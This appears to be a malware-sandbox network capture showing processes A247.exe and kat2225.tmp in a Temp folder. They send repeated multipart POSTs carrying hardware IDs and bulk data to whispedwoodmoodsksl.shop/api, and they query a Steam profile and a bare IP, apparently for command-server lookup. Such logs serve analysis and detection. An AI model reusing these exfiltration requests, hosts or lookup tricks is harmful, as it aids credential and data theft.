63 6b 54 79 46 67 2f 46 57 4f 50 41 41 74 75 59 79 32 4c 44 36 73 48 43 53 4e 77 70 48 62 43 74 37 6e 34 Data Ascii: 14084TFCaFnUR9UQAi20v4cJc+NfLI+r15ha2fOmYe5ga+3lKUcvJ6QEzF1VH/XJ+RgwokRildr0lkTU8bdOnU169O0sQG8pqkKDRV1o9YWoZyayDnmYyZbFGMW4uB/GLjSrrGdTbz+qA80QDCW7gqs1eOFKIYqk/7RH0fqsUNtQUtjvLE0iaOF6/QgOKLuGrzY+rBwtjcL41QKaye8fyC40udckTyFg/FWOPAAtuYy2LD6sHCSNwpHbCt7n4
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 72 39 75 45 72 51 69 70 67 2b 67 6a 5a 45 67 4e 6d 69 73 2f 35 50 7a 36 36 48 41 48 66 69 4d 2b 65 53 39 6e 67 71 6c 4c 63 66 79 48 64 36 53 6c 47 46 32 7a 6b 53 73 42 64 51 32 61 7a 77 65 46 33 4d 4b 4a 59 4d 34 33 43 6b 63 63 52 6a 36 58 32 44 34 4a 78 49 75 43 69 4d 51 46 33 4e 61 51 45 30 56 31 56 5a 76 4b 57 71 43 42 75 38 45 77 76 79 5a 48 50 6b 67 32 61 75 4f 46 51 6b 44 5a 56 75 61 70 72 53 43 39 68 38 41 54 38 55 30 30 2b 39 64 6e 35 42 47 7a 77 55 69 6e 4d 6d 64 65 65 52 39 62 6e 37 48 62 58 61 56 37 36 38 7a 59 42 59 53 66 73 42 4a 74 4e 51 32 61 78 6b 50 6c 2f 4c 72 41 48 64 35 37 4e 6b 63 64 56 6c 4f 2f 68 53 5a 41 32 50 72 65 69 4e 51 46 33 4a 36 31 48 30 51 38 4c 4a 61 4f 43 2f 68 6c 41 31 46 73 73 79 70 2f 52 6c 6b 57 59 30 4b 5a 4f 32 58 Data Ascii: r9uErQipg+gjZEgNmis/5Pz66HAHfiM+eS9ngqlLcfyHd6SlGF2zkSsBdQ2azweF3MKJYM43CkccRj6X2D4JxIuCiMQF3NaQE0V1VZvKWqCBu8EwvyZHPkg2auOFQkDZVuaprSC9h8AT8U00+9dn5BGzwUinMmdeeR9bn7HbXaV768zYBYSfsBJtNQ2axkPl/LrAHd57NkcdVlO/hSZA2PreiNQF3J61H0Q8LJaOC/hlA1Fssyp/RlkWY0KZO2X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49724	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:32 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12830 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:32 UTC	12830	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
2024-05-26 08:30:34 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m9qklinann27i51bh2lqk7dci0; expires=Thu, 19-Sep-2024 02:17:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BnIdjIMH5aplDKVuvfN8vS%2FTwZhpLScgsl0XacQj3xTCoHGJ30zJxxHsja%2Bxx4rdyOHGnUUxh8O9JGYyXqoNkKUzPfOsCgEXSByiVQAoYLxOgZibjZR4QBSKeWBwvFKNHgIK9iIhHdSJnk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c675e3bb00cf1-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-26 08:30:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49726	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:35 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15072 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:35 UTC	15072	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
2024-05-26 08:30:35 UTC	814	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8phvquchdr2cj7ujeu1po89n05; expires=Thu, 19-Sep-2024 02:17:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eDfGLclwRypm%2FzTvcU4yFg97tJbrDq64kOLfT1Typl9s80D%2FiIVzPYGKJsR2f%2BjD1hmoJKeqsnV%2FBszNYcba1PyDkZLinwwk0Y%2FmbA9wuRTkTMRm1Qw1aNl7TMHLutQNyaaAwxiLi67oeo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c676dbb3743e2-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-26 08:30:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49727	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:36 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20562 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:36 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
2024-05-26 08:30:36 UTC	5231	OUT	Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2024-05-26 08:30:37 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c1qtppsg4i350j701brpm5s1o9; expires=Thu, 19-Sep-2024 02:17:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDOqdf9j4XHILtJlmR7esmmeayTMZWG5y%2Bjkr4GaR1DfNrNKve3kqDzibWRw9bergYxjLD18fMkUjriePkL0fYPSmPiL%2F5peYLP7DUivcpz6vCO0K3XJGsfUgTd2udJoCoWHpP3h%2FKWKXyw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c67779ad57d14-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-26 08:30:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49728	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:38 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7083 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:38 UTC	7083	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
2024-05-26 08:30:39 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c9imi716j7ll94jdpr7mi719tu; expires=Thu, 19-Sep-2024 02:17:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2G3UAN1sma1IlJDt2E2otTmHpQlASQ6WuwZ0dO6ensk8gDxhQe4xGqoz6dLw2N8I3B0W4R%2BvKQ35EpOlXsD9NCKXrznpIzaUAZ3D0Sytwdr6VlsqQcV7vWc7MY0ONqxYNdD0YOOTvlIDH2U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c6785098d8c6f-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-26 08:30:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49735	23.67.133.187	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:01 UTC	119	OUT	GET /profiles/76561199689717899 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:02 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 26 May 2024 08:31:01 GMT Content-Length: 35682 Connection: close Set-Cookie: sessionid=6b2a816a6ef6d7e51df2399e; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
2024-05-26 08:31:02 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-26 08:31:02 UTC	10074	IN	Data Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
2024-05-26 08:31:02 UTC	11106	IN	Data Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c Data Ascii: ","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_URL_SHARED_CDN":"https:\/\/shared.cloudflare.steamstatic.com\/","CLAN_CDN_ASSET_URL":"https:\/\/clan.cloudflare.steamstatic.com\/",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49736	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:01 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1229 Host: whispedwoodmoodsksl.shop
2024-05-26 08:31:01 UTC	1229	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
2024-05-26 08:31:02 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:31:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1vbecbdef48buj8l49uu0lnio7; expires=Thu, 19-Sep-2024 02:17:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKERw9%2BSihu3yWzbBz0soz3NX9DLtm67tR00aiF7%2F%2Fo8qzZRUGZSZV4UkcG2TzjV9sYree7bmAxch%2FKaby2LnN8TMnE79yDPX41p1E4Ni34HDO%2FTQKLRZLFI1IpC6sV7Yue42M%2BrHrBGHqA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c68146e5d0cc8-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:31:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-26 08:31:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49737	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:03 UTC	186	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49738	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:03 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583478 Host: whispedwoodmoodsksl.shop
2024-05-26 08:31:03 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 38 45 45 44 32 30 34 36 33 31 38 41 44 41 43 41 31 41 38 42 34 32 37 42 36 45 32 39 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1AF8EED2046318ADACA1A8B427B6E297--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
